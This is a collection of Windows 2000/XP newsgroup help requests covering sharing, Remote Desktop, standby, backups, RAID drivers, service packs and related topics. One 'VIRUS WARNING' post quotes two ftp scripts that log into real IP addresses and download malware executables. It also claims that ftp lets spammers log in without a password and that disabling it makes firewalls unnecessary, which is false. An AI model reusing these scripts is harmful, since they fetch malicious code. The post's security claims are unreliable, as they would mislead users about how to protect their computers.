How to disable file/folder sharing?
I want to disable file/folder sharing, Thought it was done in TweakuI,
but I don't see it.
I searched, came up with data:
------
1. First, right click on "My Network Places" and select "Properties".

2. Next, find your Network Card (probably labeled "Local Area
Connection" or the name of the type of Ethernet adapter you have
installed), right click on it, and select "Properties".

I don't have "My Network Places" to start this procedure.
Looked in My Computer. Also looked in Control Panel, Network Connections-
only New Connection, or my DUN connection, in either
case, Properties does not do the above.
Internet Options didn't help either.

Terminal Services sessions timeout?
I used to remotely administrate a Windows 2000 server with TightVNC.
With TightVNC, I could log onto the server and start processes that
run in DOS windows, lock the server and disconnect. I could then
reconnect later on to the same session.
Since the server was rebuilt, I am having to use Remote Desktop from a
Windows XP client to administer the server. The problem with this is
that it appears that these Remote Desktop sessions are timing out. I
say this because when I remotely connect to the server I find no
evidence that the processes that run in DOS windows are still
running. The DOS windows have disappeared, and when I start the
processes they begin a catch-up process that would not be necessary
had they been running continuously.
I have tried reinstalling TightVNC as a system service, but when I
reboot the server and attempt a connection, I am informed that the
server does not have a password set and until one is set I won't be
able to connect to it. This is spite of having set the password!
Any thoughts on the solution to either the Remote Desktop or TightVNC
problem would be most gratefully received! Tag: I no longer can open a web address from within another web site. Tag: 563421

My computer sometimes freezes coming out of standby.
Greetings, group. I've been experiencing an annoying problem
with my Windows 2000: I usually put my computer in "Standby"
mode at night to kill fan and disk noise without wiping out
contents of RAM. I prefer standby over shut-down because the
computer can be shut-down and re-started MUCH faster that way.
(About 2 seconds to shut down and 10 seconds to start up,
as opposed to several minutes for each if I use shut-down.)
The problem is, sometimes (about 20% of the time) when I push
the "On" button to come out of standby mode, the computer
freezes. The video doesn't come on (the monitor pilot light
stays orange instead of going green), and the system doesn't
respond to the keyboard. I have to push the Reset button and
re-boot.
When I check the event logs, there is nothing there for the
initial attempt to come out of standby. It shows various
services starting up after pushing Reset and rebooting, but
it's as if the initial restart attempt never happened.
Anyone have an idea as to what might be causing this, and
how to fix it?

Best procedure/soft for backup of entire drive ?
Hello,
I'm looking for a backup software that would enable me to do the
following in case of hard disk crash:
1/ boot from a CD containing the backup/restore program and
a USB driver,
2/ plug an external USB disk containing the image of my crashed
hard drive,
3/ then find this image from my CD, and restore it to a brand new
internal hard disk.
To sum up: I'm looking for a small software, allowing me to install
it on a CD to boot from, on which I'll put a USB driver as well, to
access an external USB disk containing my backups...
I'd like to be able to backup an entire drive, whatever the
filesystems
(NTFS...) existing on them...
Are there free programs to do that ?
In advance, thanks very much.

missing pagefile.sys
On reboot yesterday, the first in some weeks, Windows 2000 5.00.2195 SP4
encountered the subject: error exactly as described in
http://support.microsoft.com/?id=315270
Efforts to follow the remedy stated are meeting difficulties. The pagefile
is indeed defined and of size 800-1000 MB , the computer name is "w2k2." as
it's been since inception several years ago.
The difficulty starts in Step 3-f, as we don't have a "Computer Name" tab in
the System Properties dialog, but it's possible to rationalize using the
"Network Identification" tab instead, as it's the only possibility that
makes sense.
The larger difficulty comes in step 4, as there is no "File menu" from which
to make the subsequent selections.
What are we missing here please? There are a few services which haven't
started due to "Error 5: Access is Denied" problems, and that's what
prompted the reboot in the first place. Things are rather awkward as the
machine is headless; we normally access it using the "VNC server" service,
but that's one of the services that can't start.
Is there any help available please? Tag: I no longer can open a web address from within another web site. Tag: 563370
Changing the Windows Explorer View to 'List' from 'icons'
Hello,
Windows 2000 SP4, Windows XP SP2, Windows 2003 AD Domain in Windows 2000 mode.
I've written a script that changes the windows explorer view to 'list'. It
works by writing values to the 'Streams' key in HKCU and seems to work fine
when I run this as an administrator.
However, when I login as a non-administrator, the view is still 'icons'.
I have written a second script to interrogate the registry to verify that
the changes that I made had been written successfully - they had.
Given that the non-administrator user has group policy settings applied to
them, would this be the reason why my registry changes are not taking effect?
As far as I can tell, there is no mention of the 'Streams' key in the ADM
files that are applied to the client/user.
The following policies are applied to Windows Explorer and seem to update
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Do not track shell shortcuts during roaming
Hide these drives in My Computer
Hide Manage on Explorer contect menu
No 'Computers Near Me' in Network Places
No 'Entire Network' in Network Places
Prevent access to these drives in My Computer
Remove DFS, Hardware Tabs
Remove Search
Remove UI to change Keyboard navigation indicator and menu animation settings
Remove Folder Options on tools
Turn on Classic Shell
I have performed a test and updated my scripts to write to the 'Policies'
Key (by adding the user to an administrative group). The results were that
the registry entries were created, but again, no change was made in Windows
Explorer
Also I could not find a policy that defined the Windows Explorer view,
otherwise I would have used that as a method of setting the view for the user.
I've included below the script that modifies the registry - It does a check
for XP or 2000 as we have both clients in our environment.
Any help would be appreicated either in suggesting an alternative method of
changing the explorer view, or suggestions why the registry changes are not
being 'read' or 'applied' by users who have the GPO's applied.
Script: It's an AutoIT script......

*** VIRUS WARNING!!! ***
I have discovered how Spammers are able to access people's Computers to spew
out their Spyware garbage, and it is Microsoft's OS which has made this
possible! Spammers utilize two commands: the "nslookup" Command and the
"ftp" Command found in c:\winnt\system32 -- which you can review in the
Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
Computer while logged onto the Internet to download a Virus. Those E-Mails
you get from friends telling you to forward it on to others, in order to get
good luck or money, are nothing but a SCAM perpetrated by the Spammers!
DELETE those E-Mails -- DO NOT open them!!! Last month after separately
opening two of those E-Mails, I ended up with a Virus on my Computer spewing
out data over the Internet, and also the following two Text Files given the
name "i" under the 'winnt' Directory.
--- \winnt\i
open 136.145.69.79 2755
user 1 1
get kp.exe
quit
--- \winnt\i
open 208.111.5.228 2755
user 1 1
get 2k3.exe
quit
---
The Virus Commands I subsequently found under the 'winnt' or 'system32'
Directories corresponded to the two ".exe" Files named in those two Text
Files. I didn't know where those 4 Command Lines in those "i" Files were
executable until just today when I looked up the "ftp" Command in Help.
Those are 4 sub-commands which caused my Computer to open up the said IP
Address and Port#, log in as the user 1 1, download the Virus Command, and
then quit "ftp". Since I'm a Dial-up user, I immediately noticed something
wrong because this immediately clogged up my Internet Connection. A High
Speed user might not notice anything!
It is unbelievable, but the "ftp" Command enables the Spammer to log onto
your Computer WITHOUT using an ID and Password! Further, "ftp" enables the
Spammer to prevent you from seeing what it is doing on your Computer!!! I'm
not kidding! Further still, the "nslookup" Command enables the Spammer to
find out your IP Numbers and Computer ID so that he can use the "ftp"
Command! It is as if Microsoft specifically designed these two Commands to
help Spammers! As far as I can tell, you cannot disable either of these
Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to
"nslookup.exe.rename" in order to make them non-executable, but I don't think
this will solve the problem. Would a Microsoft Corporation technician please
inform us if these two Command functions can be disabled? If not, Microsoft
needs to IMMEDIATELY provide a Service Pack or update to enable these two
functions to be disabled using the "net stop / start" Command. With these
functions disabled, a Firewall Application becomes completely unnecessary! Tag: I no longer can open a web address from within another web site. Tag: 563362

background won't stick
I have read the various posts on this issue but none fits exactly.
Computer is operating on Windows XP connected to a server with full
admin rights to the local machine.
If we change the background it sticks for a while but then changes by
itself and sort of tiles the image, but not exactly. It divides the
large full screen picture and puts the bottom right corner of the
picture in the top left corner of the screen and the top left part of
the picture in the lower right corner of the machine.
For example we put the coffee bean back ground on and it does fine for
a while and later it will have the moon back ground image, divided as
desribed above.
I looked for the Active Desktop content check box and I don't see
that under any of the tabs.

How do I remove the dual boot option?

Windows Service Pack 4 ~ Problems with the Registry
I want to inform Windows 2000 users about problems which Service Pack 4 can
cause. I can state from personal experience that installing Service Pack 4
can screw up some of your previously-installed Software. After installing
SP4, my FaxTalk Modem Software didn't work properly, and using the Windows
procedure to "Remove" and re-install it, didn't solve the problem. The
Windows Remove procedure didn't remove the FaxTalk's contents in the
Registry. Thankfully, the FaxTalk Website provided information to manually
remove it from the Registry, and after doing that it re-installed correctly.
So, if you should have some new problem with a Software Application after
installing SP4, you need to manually remove (including from the Registry) and
re-install the Software. Hopefully that will solve the problem. Tag: I no longer can open a web address from within another web site. Tag: 563291

provides a List of QBasic's COMMANDS, and the proper syntax for its Commands.
Does anyone have a complete list of QBasic Commands & Syntax which you could
post here, or E-Mail them to me at tlmester@niagara.com. Thanks for you help.

W2k - failure to load SP4 because of no Web access
Hi
I have downloaded SP4 and am trying to install it on a laptop that does not
have web access (yet!).
The process stops with a setup error telling me to go to the W2k Service
Pack Web site and select the 'Problems Downloading the Service Pack'.
Apparently, I can get information about downloading a version of the service
pack that does not need a Web connection.
I CAN'T EVEN FIND THE SP WEB SITE!!!
Can anyone help an aging newbie please?
Best wishes

can I delete hotfixes?
Hi to all,
I have 100 hotfixes installed on my system and would like to uninstall
them - will this wreak havoc?
my problem is very slow response time on my computer, and I have tried
to speed it up by uninstalling old stuff and disabling other things with
no change in speed. All of these hotfixes are the only things left.
I'm running Win2k sp4...
thanks to all,

Have to log off twice...
On my Windows 2000 Server for some reason I have to log off twice. the first
attemtp to log off, shut down or restart does not do anything! This issue
does not seem to generate any errors or cause any other problems but it is
very annoying...
Anyone, any ideas on what is causing it and how it can be fixed?
Thanks,
/Adde

Error Message Occurred When Unsharing
We have a file sharing setup on Windows 2003 Domain Controller. When we
unshare the folder, we got the error message "An error occurred while trying
to delete share speech. The share must be removed from Distributed File
System before it can be deleted". Do you have any suggestions on how to
unshare the folder? Thanks.

mouse pointer - double speed?
Is there a way to get my logitech mouse (marble mouse trackball) to go
at double speed? Even the "fast" box is much slower than the same
option under windows 98se. Logitech doesn't respond, so, maybe
someone here knows of an aftermarket program that will just double the
motion speed of the mouse - ok? Tag: I no longer can open a web address from within another web site. Tag: 563239
Reboot?
I have an odd situation that may (or may not) be related to my Win2K
configuration.
I run AVG antivirus on 4 machines all with Win2K. AVG is set to update
automatically each day.
Recently, on one machine only, the update software is demanding a
machine reboot to complete the update. It didn't used to do this and
none of the other machines do it and they are all receiving the same
updates.
This leads me to believe it's a difference in OS configuration which is
necessitating this reboot. It's a minor nuisance but does anyone have
any idea what might affect this? Tag: I no longer can open a web address from within another web site. Tag: 563233
Can't seem to make IE the default
A few weeks back, an update for my W2K O/S might have had a gremlin or two
in it. Anyway, since then whenever I use IE, I never get asked if I want to
make it the default. (My normal browser is Opera.) However, it suits me to
switch for a while. How can I make IE the default?

Reinstalling RAID Drivers
Hi all,
I have a Dell PowerEdge 2500 server, which has a PERC 3Di RAID
controller in it, attached to two 36G drives, which are mirrored,
running Windows 2000 SBS.
We have been having problems lately, where one drive has been going
offline - so the other day, we tried to install some of Tools from the
Dell website, for diagnosis - unfortunately, one of them, it would
appear, has somehow deleted or replaced the correct driver - after
restarting (to complete an install of one of the tools), we now get a
STOP Error: INACCESSIBLE_BOOT_DEVICE.
The drives are online at the moment, the array is intact and the data
seems to be on the disk (I've used a boot CD to get in and check the
data) - so I'm thinking this must be a driver issue - especially given
the nature of the stuff we were installing at the time.
So my question: How do I get the correct driver installed if I can't
get into Windows? I have the 2000 SBS install media, so I can run
Recovery Console. I also have a valid, full, NTBACKUP backup of the
system, again if that's any good (I was going to restore System State
- but again, I can't get into Restore Mode because it won't boot).
HELP!
Thanks in advance,

dueal boot - blue and white screen
On ASUS notebook with Windows XP Home attempted to make it dual boot to
install W2K. Before dong any changes I copied original ntldr (245K) and
ntdetect.com(47K).
With Partition Magic created an NTFS primary partition and installed W2K Pro
which went smoothly, and W2K was running OK
XP Home would not start at all because, as I seem to remember, ntldr(211K)
and ntdetect.com(34K) generated by W2K would not load XP, -so I replaced
them with the those of XP Home I copied earlier.
Now after selecting XPHome it produces the screen suggesting several modes
of loading XP Home, but whatever mode I select it just restarts the
computer.
I replaced ntldr and ntdetect.com with ntldr(230K) and ntdetect.com(47K)
from my working desktop. The first - booting into XP gave the same result,
i.e. list of loading optioons and restarting the computer.
But now W2K would not start. After shortly flashing that screen of starting
W2K, it produced a blue_and_white screen of some gobbledegook among which
there are english patterns like
STOP: 0x000000A5 (0x00000002, 0x8907DE88,0x88FB23ó8,0x00000001)
ASPI BIOS
"readme.txt"

<F&>
(I guess the remaining gobbledegook represent Cyrilics as the computer is
localised for Russia)
I placed the screenshot here:

cannot delete empty folders, cannot W-update, cannot inplace upgrade
After giving up on the problem deleting recently emptied folders, I
tried to update the W2K installation. This failed with a fairly common
error message EOX..... the details of which I do not have access to
for reasons explained below. None of the MS site suggestions allowed
the windows update to begin.
Assuming the W2K SP4 installation to be corrupt, I attempted to
perform an in-place upgrade, booting from the installation CD with the
correct raid drivers available during start-up. After failing to read
spxcoins.dl_ off the installation disk, or off a subsequent floppy
copy, the inplace upgrade stopped midway during final registry of
devices.
The spxcoins.dl_ is present on the install disk. The installation
program does not display the files name's '.dl_' type, when 'browsing'
for the 'missing' file.
This is repeated for any subsequent attempt to complete the upgrade.
As this is an ntfs installation on a raid device, I have no other
operating systems or hardware to retrieve data off the drive, and no
access to the second boot option WXP on the second raid hard drive,
while the first is non-compos mentis.
When I tried to install a temporary W2K OS in a drive mounted in an
IDE position, I got the same errors. The correct raid drivers are
loaded when booting from the installation CD, via floppy. Booting up
into W2K, I get the message that the install did not complete and a
run through of the same loop of missing .dl_file and stopped device
registry.
Any advice on:
1) completing the in-place upgrade
2) retreiving data
3) getting the temporary functional W2K OS installed on an IDE drive.

Users & Groups
Win 2000 Server.
I want to ad a user to the "Administrators" group who is now a member of the
"domain user" group.
Should I just add them to the Administrator and also leave them as a member
of the domain user group, or remove them from the domain user group.
I'm not sure if being a member of both groups is only redundant or could
cause a problem.

Windows 2000 Server StandardEdition /PAE Question
Hi.
I have a Windows 2000 Server Standard Edition, with 4GB of RAM installed. I
also have SQL Server 2000 Standard Edition installed on the same server.
I'd like Windows to 'see' all $GB of RAM and I've read articles on /PAE, but
unfortunately some of these articles imply that Windows 2000 Server Standard
Edition cannot use /PAE. So I have a couple of questions that I hope the
group can answer:
1) Does Windows 2000 Server Standard Edition only support 2GB of RAM out of
the box?
2) Can /PAE be enabled on 2000 Server Standard Edition to allow it to
utilize all 4GB?
Thanks in advance.
